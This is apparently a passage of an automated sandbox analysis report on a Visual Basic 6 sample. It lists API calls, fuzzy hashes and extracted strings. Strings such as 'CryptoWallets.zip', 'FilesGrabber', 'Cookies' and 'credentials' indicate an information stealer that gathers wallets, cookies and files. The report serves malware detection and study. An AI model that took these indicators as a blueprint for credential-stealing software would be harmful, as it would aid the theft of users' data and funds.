                                                                                    • __vbaAryConstruct2.MSVBVM60(?,00418434,00000011,?,?,?,?,004016A6), ref: 0041B8C4
                                                                                    • __vbaStrCopy.MSVBVM60(?,00418434,00000011,?,?,?,?,004016A6), ref: 0041B8D1
                                                                                    • #644.MSVBVM60(?,?,00418434,00000011,?,?,?,?,004016A6), ref: 0041B8DD
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,?,?,00418434,00000011,?,?,?,?,004016A6), ref: 0041B8F1
                                                                                    • __vbaDerefAry1.MSVBVM60(?,00000000,?,00000000,?,?,00418434,00000011,?,?,?,?,004016A6), ref: 0041B8FE
                                                                                    • #644.MSVBVM60(00000000,?,00000000,?,00000000,?,?,00418434,00000011,?,?,?,?,004016A6), ref: 0041B904
                                                                                    • __vbaAryUnlock.MSVBVM60(?,00000000,?,00000000,?,00000000,?,?,00418434,00000011,?,?,?,?,004016A6), ref: 0041B916
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000040,?,00000000,?,00000000,?,00000000,?,?,00418434,00000011), ref: 0041B92B
                                                                                    • #644.MSVBVM60(?), ref: 0041B947
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,?), ref: 0041B95E
                                                                                    • __vbaDerefAry1.MSVBVM60(?,?,?,00000000,?), ref: 0041B96F
                                                                                    • #644.MSVBVM60(00000000,?,?,?,00000000,?), ref: 0041B975
                                                                                    • __vbaAryUnlock.MSVBVM60(?,00000000,?,?,?,00000000,?), ref: 0041B987
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,000000F8,?,00000000,?,?,?,00000000,?), ref: 0041B9A2
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0041DCC0), ref: 0041DC83
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,0041DCC0), ref: 0041DC8B
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,0041DCC0), ref: 0041DC93
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,0041DCC0), ref: 0041DC9B
                                                                                    • __vbaRecDestruct.MSVBVM60(00417150,?,00000000,?,0041DCC0), ref: 0041DCAC
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00417150,?,00000000,?,0041DCC0), ref: 0041DCBA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$#644$DestructFree$Ary1DerefErrorLockSystemUnlock$ChkstkConstruct2Copy
                                                                                    • String ID: $$$$1F132D311D3A03250D35391E1D2D082C392A$21141925070F233900262436113D3F39$2227123C1B3D21250E320D1A05271E1C$250027321D0607282907091D16002B12$310B332A3309221F101360020D382A2C18361A353E0D2A010C275F7F5B4D4053457B6906291B04282F3B03253267241E34$323C1600153408171A0227140232$331D1B2C37363F0720173B11$34200607101100041D050933$39013B071F352D1E182F2A$3D391132302D1E1220353A1A300E$@$@$DohIsjTAXjJOpbNYELswLcxnilHMTWnTGvRnxdGgEXD$JbItseplEqifPrnxZrWWyrLteYMYDcjL$KERNEL32$MZ$NaxhYZSkoRrZuueHfvOCJjpJwNurLgLkabdqoBYPJl$NmFZIAfQpvgNLHlvjjWwPIbXjPQkQkcscvJPZhktdN$PE$PHaDExjqJnPJmPHeCKSUaUOVQibgCiPNd$\Microsoft.NET\Framework\v4.0.30319$ikPcFELrSLYUyuvnxqqIhY$lqNsaaQXeuaBgqspwIRQDEvkgcPUSISAaAKYQHUXxtU$sbeSfutbIMDf$tqBfhsODDjqb$yuqkHnaBMevVYrXLJibiuUu
                                                                                    • API String ID: 156183336-1715039212
                                                                                    • Opcode ID: 3f9243ccf007584edf98e65947650d2a1fe05f57fba7ea98ddab5f8e381595ca
                                                                                    • Instruction ID: 41fe362a22c8944d5e3f01c0ae7673ddc6b9ee917e3f6520ae82f7a8616e00d2
                                                                                    • Opcode Fuzzy Hash: 3f9243ccf007584edf98e65947650d2a1fe05f57fba7ea98ddab5f8e381595ca
                                                                                    • Instruction Fuzzy Hash: ED231A72D409289ADB21EB61CC51BDFB7B9AB0430AF1080EAE109B7191EB795FC5CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph (function starting at 00418C4B; legend: Executed / Not Executed)
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 00418C69
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004016A6), ref: 00418CAA
                                                                                    • __vbaNew2.MSVBVM60(004171B8,00000000), ref: 00418CC5
                                                                                    • __vbaStrMove.MSVBVM60(00000015,?), ref: 00418D0B
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171C8,00000054), ref: 00418D46
                                                                                    • __vbaCastObj.MSVBVM60(?,004171D8), ref: 00418D62
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,004171D8), ref: 00418D6C
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000,?,004171D8), ref: 00418D74
                                                                                    • __vbaFreeObj.MSVBVM60(?,00000000,?,004171D8), ref: 00418D7C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171D8,00000068), ref: 00418DC4
                                                                                    • __vbaObjSet.MSVBVM60(?,?), ref: 00418DF2
                                                                                    • __vbaForEachCollObj.MSVBVM60(004171E8,?,?,00000000,?,?), ref: 00418E08
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171E8,00000020), ref: 00418E4F
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171E8,00000020), ref: 00418E93
                                                                                    • __vbaInStr.MSVBVM60(00000000,00000000,?,00000001), ref: 00418EB3
                                                                                    • __vbaInStr.MSVBVM60(00000000,.txt,?,00000001,00000000,00000000,?,00000001), ref: 00418EC6
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,.txt,?,00000001,00000000,00000000,?,00000001), ref: 00418EE6
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171E8,00000020), ref: 00418F3E
                                                                                    • __vbaStrMove.MSVBVM60(00000015), ref: 00418F63
                                                                                    • __vbaStrCat.MSVBVM60(004170F4,00000000,00000015), ref: 00418F6E
                                                                                    • __vbaStrMove.MSVBVM60(004170F4,00000000,00000015), ref: 00418F78
                                                                                    • __vbaStrCat.MSVBVM60(?,00000000,004170F4,00000000,00000015), ref: 00418F81
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,004170F4,00000000,00000015), ref: 00418F8B
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000,004170F4,00000000,00000015), ref: 00418F9E
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171E8,00000020), ref: 00418FD3
                                                                                      • Part of subcall function 0041AAFB: __vbaChkstk.MSVBVM60(00000015,004016A6,00000001,?,?,?,?,004016A6), ref: 0041AB17
                                                                                      • Part of subcall function 0041AAFB: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB47
                                                                                      • Part of subcall function 0041AAFB: __vbaStrCopy.MSVBVM60(000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB5B
                                                                                      • Part of subcall function 0041AAFB: __vbaNew2.MSVBVM60(00416410,0041F010,000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB7A
                                                                                      • Part of subcall function 0041AAFB: __vbaHresultCheckObj.MSVBVM60(00000000,?,004168F4,00000058), ref: 0041ABBE
                                                                                      • Part of subcall function 0041AAFB: __vbaSetSystemError.MSVBVM60(?,?,000000FF), ref: 0041ABE0
                                                                                      • Part of subcall function 0041AAFB: #525.MSVBVM60(00000104,?,?,000000FF), ref: 0041AC07
                                                                                      • Part of subcall function 0041AAFB: __vbaStrMove.MSVBVM60(00000104,?,?,000000FF), ref: 0041AC11
                                                                                      • Part of subcall function 0041AAFB: __vbaStrToAnsi.MSVBVM60(?,?,00000104,?,?,000000FF), ref: 0041AC24
                                                                                      • Part of subcall function 0041AAFB: __vbaSetSystemError.MSVBVM60(000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC35
                                                                                      • Part of subcall function 0041AAFB: __vbaStrToUnicode.MSVBVM60(?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC41
                                                                                      • Part of subcall function 0041AAFB: __vbaFreeStr.MSVBVM60(?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC58
                                                                                    • __vbaStrMove.MSVBVM60(00000015), ref: 00419002
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171E8,00000020), ref: 00419037
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,004171E8,00000020), ref: 00419061
                                                                                    • __vbaStrCat.MSVBVM60(004170F4,00000000), ref: 0041906C
                                                                                    • __vbaStrMove.MSVBVM60(004170F4,00000000), ref: 00419076
                                                                                    • __vbaStrCat.MSVBVM60(?,00000000,004170F4,00000000), ref: 0041907F
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,004170F4,00000000), ref: 00419089
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,004170F4,00000000), ref: 004190A4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,004170F4,00000000), ref: 004190BF
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,000006FC), ref: 00419104
                                                                                    • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0041914A
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171E8,00000020), ref: 0041918E
                                                                                    • __vbaStrMove.MSVBVM60(00000015), ref: 004191BD
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171E8,00000020), ref: 004191F2
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,004171E8,00000020), ref: 0041921C
                                                                                    • __vbaStrCat.MSVBVM60(004170F4,00000000), ref: 00419227
                                                                                    • __vbaStrMove.MSVBVM60(004170F4,00000000), ref: 00419231
                                                                                    • __vbaStrCat.MSVBVM60(?,00000000,004170F4,00000000), ref: 0041923A
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,004170F4,00000000), ref: 00419244
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,004170F4,00000000), ref: 0041925F
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000,004170F4,00000000), ref: 0041926C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,000006FC), ref: 004192B1
                                                                                    • __vbaFreeStrList.MSVBVM60(00000007,?,?,?,?,?,?,00000000), ref: 004192E3
                                                                                    • __vbaNextEachCollObj.MSVBVM60(004171E8,?,?), ref: 00419302
                                                                                    • __vbaCastObj.MSVBVM60(00000000,004171E8), ref: 00419328
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,00000000,004171E8), ref: 00419332
                                                                                    • __vbaCastObj.MSVBVM60(00000000,004171D8,?,00000000,00000000,004171E8), ref: 00419345
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,00000000,004171D8,?,00000000,00000000,004171E8), ref: 0041934F
                                                                                    • __vbaCastObj.MSVBVM60(00000000,004171A8,?,00000000,00000000,004171D8,?,00000000,00000000,004171E8), ref: 00419362
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,00000000,004171A8,?,00000000,00000000,004171D8,?,00000000,00000000,004171E8), ref: 0041936C
                                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,?,0041940D,?,00000000,00000000,004171A8,?,00000000,00000000,004171D8,?,00000000,00000000,004171E8), ref: 004193E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$CheckHresult$Free$CastErrorList$ChkstkCollCopyEachNew2System$#525AnsiNextUnicode
                                                                                    • String ID: .txt
                                                                                    • API String ID: 759863438-2195685702
                                                                                    • Opcode ID: 81c78085e799ba46981566278baa428245e80f1395d6c3fbb0afbb7567141371
                                                                                    • Instruction ID: e9426b278dfe8678ca5e3732bfefe0d2f455cb118c757abbc66000c08e162939
                                                                                    • Opcode Fuzzy Hash: 81c78085e799ba46981566278baa428245e80f1395d6c3fbb0afbb7567141371
                                                                                    • Instruction Fuzzy Hash: 3A22C772D40218EFDB11EBA1CC45FDDBBB9BF08304F1081AAE509B71A1DB785A859F64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph (function starting at 00419436; legend: Executed / Not Executed)
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 00419452
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004016A6), ref: 00419497
                                                                                    • __vbaStrCopy.MSVBVM60(000000FF,?,?,?,?,004016A6), ref: 004194BC
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,000006F8), ref: 004194F0
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00419501
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00419509
                                                                                    • __vbaStrCopy.MSVBVM60(000000FF,?,?,?,?,004016A6), ref: 0041955C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,000006F8), ref: 00419590
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004195A1
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004195A9
                                                                                    • __vbaStrCopy.MSVBVM60(000000FF,?,?,?,?,004016A6), ref: 004195FC
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,000006F8), ref: 00419630
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00419641
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00419649
                                                                                    • __vbaStrCopy.MSVBVM60(000000FF,?,?,?,?,004016A6), ref: 0041969C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,000006F8), ref: 004196D0
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004196E1
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004196E9
                                                                                    • __vbaStrCat.MSVBVM60(\CryptoWallets.zip), ref: 00419744
                                                                                    • #645.MSVBVM60(?,00000000,\CryptoWallets.zip), ref: 00419759
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,\CryptoWallets.zip), ref: 00419763
                                                                                    • __vbaStrCmp.MSVBVM60(0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 0041976E
                                                                                    • __vbaFreeStr.MSVBVM60(0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 00419782
                                                                                    • __vbaFreeVar.MSVBVM60(0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 0041978A
                                                                                    • __vbaStrCat.MSVBVM60(\CryptoWallets.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 004197AD
                                                                                    • __vbaStrMove.MSVBVM60(\CryptoWallets.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 004197B7
                                                                                    • __vbaStrCopy.MSVBVM60(\CryptoWallets.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 004197C4
                                                                                    • __vbaStrCopy.MSVBVM60(\CryptoWallets.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 004197D1
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,000006FC), ref: 0041980D
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00419829
                                                                                    • __vbaStrCat.MSVBVM60(\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 00419843
                                                                                    • #645.MSVBVM60(00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 00419858
                                                                                    • __vbaStrMove.MSVBVM60(00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 00419862
                                                                                    • __vbaStrCmp.MSVBVM60(0041720C,00000000,00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 0041986D
                                                                                    • __vbaFreeStr.MSVBVM60(0041720C,00000000,00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 00419881
                                                                                    • __vbaFreeVar.MSVBVM60(0041720C,00000000,00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 00419889
                                                                                    • __vbaStrCat.MSVBVM60(\Files.zip,0041720C,00000000,00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 004198AC
                                                                                    • __vbaStrMove.MSVBVM60(\Files.zip,0041720C,00000000,00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 004198B6
                                                                                    • __vbaStrCopy.MSVBVM60(\Files.zip,0041720C,00000000,00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 004198C3
                                                                                    • __vbaStrCopy.MSVBVM60(\Files.zip,0041720C,00000000,00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 004198D0
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,000006FC), ref: 0041990C
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00419928
                                                                                    • __vbaErrorOverflow.MSVBVM60(000000FF,?,?,?,?,004016A6), ref: 0041997D
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6,?,?,?,?,?,004016A6), ref: 0041999E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004016A6), ref: 004199E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Copy$CheckHresult$Move$Error$#645ChkstkList$Overflow
                                                                                    • String ID: $Contacts$Cookies$CryptoWallets$FilesGrabber$Messages$\CryptoWallets.zip$\Files.zip$bI4$credentials
                                                                                    • API String ID: 697947717-4061810211
                                                                                    • Opcode ID: e50c78c1c68016554c755f30e4c5dbbdc4474f3e454d2f1d9bd4a84fad425797
                                                                                    • Instruction ID: 64c6bbdb384e03511a1afb09f3ccc82d4d757d238a9177fc85920aa69796aae0
                                                                                    • Opcode Fuzzy Hash: e50c78c1c68016554c755f30e4c5dbbdc4474f3e454d2f1d9bd4a84fad425797
                                                                                    • Instruction Fuzzy Hash: D1F1FB72900208EFDB01EF94D945BDDBBB5EF08304F10807AF405BB2A1DB799A85DB68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6,00000001,?,?,?,?,004016A6), ref: 0041DD07
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004016A6,00000001), ref: 0041DD37
                                                                                      • Part of subcall function 0041AAFB: __vbaChkstk.MSVBVM60(00000015,004016A6,00000001,?,?,?,?,004016A6), ref: 0041AB17
                                                                                      • Part of subcall function 0041AAFB: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB47
                                                                                      • Part of subcall function 0041AAFB: __vbaStrCopy.MSVBVM60(000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB5B
                                                                                      • Part of subcall function 0041AAFB: __vbaNew2.MSVBVM60(00416410,0041F010,000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB7A
                                                                                      • Part of subcall function 0041AAFB: __vbaHresultCheckObj.MSVBVM60(00000000,?,004168F4,00000058), ref: 0041ABBE
                                                                                      • Part of subcall function 0041AAFB: __vbaSetSystemError.MSVBVM60(?,?,000000FF), ref: 0041ABE0
                                                                                      • Part of subcall function 0041AAFB: #525.MSVBVM60(00000104,?,?,000000FF), ref: 0041AC07
                                                                                      • Part of subcall function 0041AAFB: __vbaStrMove.MSVBVM60(00000104,?,?,000000FF), ref: 0041AC11
                                                                                      • Part of subcall function 0041AAFB: __vbaStrToAnsi.MSVBVM60(?,?,00000104,?,?,000000FF), ref: 0041AC24
                                                                                      • Part of subcall function 0041AAFB: __vbaSetSystemError.MSVBVM60(000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC35
                                                                                      • Part of subcall function 0041AAFB: __vbaStrToUnicode.MSVBVM60(?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC41
                                                                                      • Part of subcall function 0041AAFB: __vbaFreeStr.MSVBVM60(?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC58
                                                                                    • __vbaStrMove.MSVBVM60(00000024), ref: 0041DD58
                                                                                    • __vbaStrMove.MSVBVM60(00000024), ref: 0041DD6D
                                                                                    • __vbaStrCat.MSVBVM60(\Microsoft.NET\Framework\v4.0.30319,00000000,00000024), ref: 0041DD78
                                                                                    • #645.MSVBVM60(00000008,00000010,\Microsoft.NET\Framework\v4.0.30319,00000000,00000024), ref: 0041DD8D
                                                                                    • __vbaStrMove.MSVBVM60(00000008,00000010,\Microsoft.NET\Framework\v4.0.30319,00000000,00000024), ref: 0041DD97
                                                                                    • __vbaStrCmp.MSVBVM60(0041720C,00000000,00000008,00000010,\Microsoft.NET\Framework\v4.0.30319,00000000,00000024), ref: 0041DDA2
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000,0041720C,00000000,00000008,00000010,\Microsoft.NET\Framework\v4.0.30319,00000000,00000024), ref: 0041DDC3
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,004016A6,00000001), ref: 0041DDCE
                                                                                    • __vbaStrMove.MSVBVM60(?,00000002,?,00000000,004016A6), ref: 0041DE01
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041DE15
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041DE2A
                                                                                      • Part of subcall function 0041AAFB: __vbaInStr.MSVBVM60(00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC78
                                                                                      • Part of subcall function 0041AAFB: #616.MSVBVM60(?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC86
                                                                                      • Part of subcall function 0041AAFB: __vbaStrMove.MSVBVM60(?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC90
                                                                                      • Part of subcall function 0041AAFB: __vbaStrCat.MSVBVM60(0041720C,00000000,?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?), ref: 0041AC9B
                                                                                      • Part of subcall function 0041AAFB: __vbaStrMove.MSVBVM60(0041720C,00000000,?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?), ref: 0041ACA5
                                                                                      • Part of subcall function 0041AAFB: __vbaFreeStr.MSVBVM60(0041720C,00000000,?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?), ref: 0041ACAD
                                                                                      • Part of subcall function 0041AAFB: __vbaFreeStr.MSVBVM60(0041ACDD,?,?,000000FF), ref: 0041ACD7
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000,00000024), ref: 0041DE55
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,?,00000000,00000024), ref: 0041DE5B
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,00000000,00000024), ref: 0041DE67
                                                                                    • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,00000000,00000000,?,?,00000000,00000024), ref: 0041DE86
                                                                                    • __vbaStrMove.MSVBVM60(00000024), ref: 0041DE3D
                                                                                      • Part of subcall function 0041AE58: __vbaChkstk.MSVBVM60(00000000,004016A6), ref: 0041AE74
                                                                                      • Part of subcall function 0041AE58: __vbaLenBstr.MSVBVM60(004014D0,?,?,?,00000000,004016A6), ref: 0041AE8B
                                                                                      • Part of subcall function 0041AE58: #631.MSVBVM60(004014D0,00000001,00000002), ref: 0041AED8
                                                                                      • Part of subcall function 0041AE58: __vbaStrMove.MSVBVM60(004014D0,00000001,00000002), ref: 0041AEE2
                                                                                      • Part of subcall function 0041AE58: #516.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEE8
                                                                                      • Part of subcall function 0041AE58: __vbaFreeStr.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEF4
                                                                                      • Part of subcall function 0041AE58: __vbaFreeVar.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEFC
                                                                                      • Part of subcall function 0041AE58: __vbaLenBstr.MSVBVM60(?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF18
                                                                                      • Part of subcall function 0041AE58: #631.MSVBVM60(?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF34
                                                                                      • Part of subcall function 0041AE58: __vbaStrMove.MSVBVM60(?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF3E
                                                                                      • Part of subcall function 0041AE58: #516.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF44
                                                                                      • Part of subcall function 0041AE58: __vbaFreeStr.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF50
                                                                                      • Part of subcall function 0041AE58: __vbaFreeVar.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF58
                                                                                      • Part of subcall function 0041AE58: #608.MSVBVM60(00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF7A
                                                                                      • Part of subcall function 0041AE58: __vbaVarAdd.MSVBVM60(?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF8B
                                                                                      • Part of subcall function 0041AE58: __vbaStrVarMove.MSVBVM60(00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF91
                                                                                      • Part of subcall function 0041AE58: __vbaStrMove.MSVBVM60(00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF9B
                                                                                      • Part of subcall function 0041AE58: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0), ref: 0041AFAA
                                                                                    • __vbaStrCopy.MSVBVM60(00000002,?,00000000,004016A6), ref: 0041DDEE
                                                                                      • Part of subcall function 0041ACF6: __vbaChkstk.MSVBVM60(00000000,004016A6,?,00000015,004016A6,00000001), ref: 0041AD12
                                                                                      • Part of subcall function 0041ACF6: __vbaLenBstr.MSVBVM60(004014C0,?,?,?,00000000,004016A6), ref: 0041AD29
                                                                                      • Part of subcall function 0041ACF6: #632.MSVBVM60(?,00004008,00000001,00000002), ref: 0041ADA0
                                                                                      • Part of subcall function 0041ACF6: __vbaVarCat.MSVBVM60(?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADB4
                                                                                      • Part of subcall function 0041ACF6: __vbaI4ErrVar.MSVBVM60(00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADBA
                                                                                      • Part of subcall function 0041ACF6: #537.MSVBVM60(00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADC0
                                                                                      • Part of subcall function 0041ACF6: __vbaStrMove.MSVBVM60(00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADCA
                                                                                      • Part of subcall function 0041ACF6: __vbaStrCat.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADD0
                                                                                      • Part of subcall function 0041ACF6: __vbaStrMove.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADDA
                                                                                      • Part of subcall function 0041ACF6: __vbaFreeStr.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADE2
                                                                                      • Part of subcall function 0041ACF6: __vbaFreeVarList.MSVBVM60(00000004,00000002,?,?,?,00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADF9
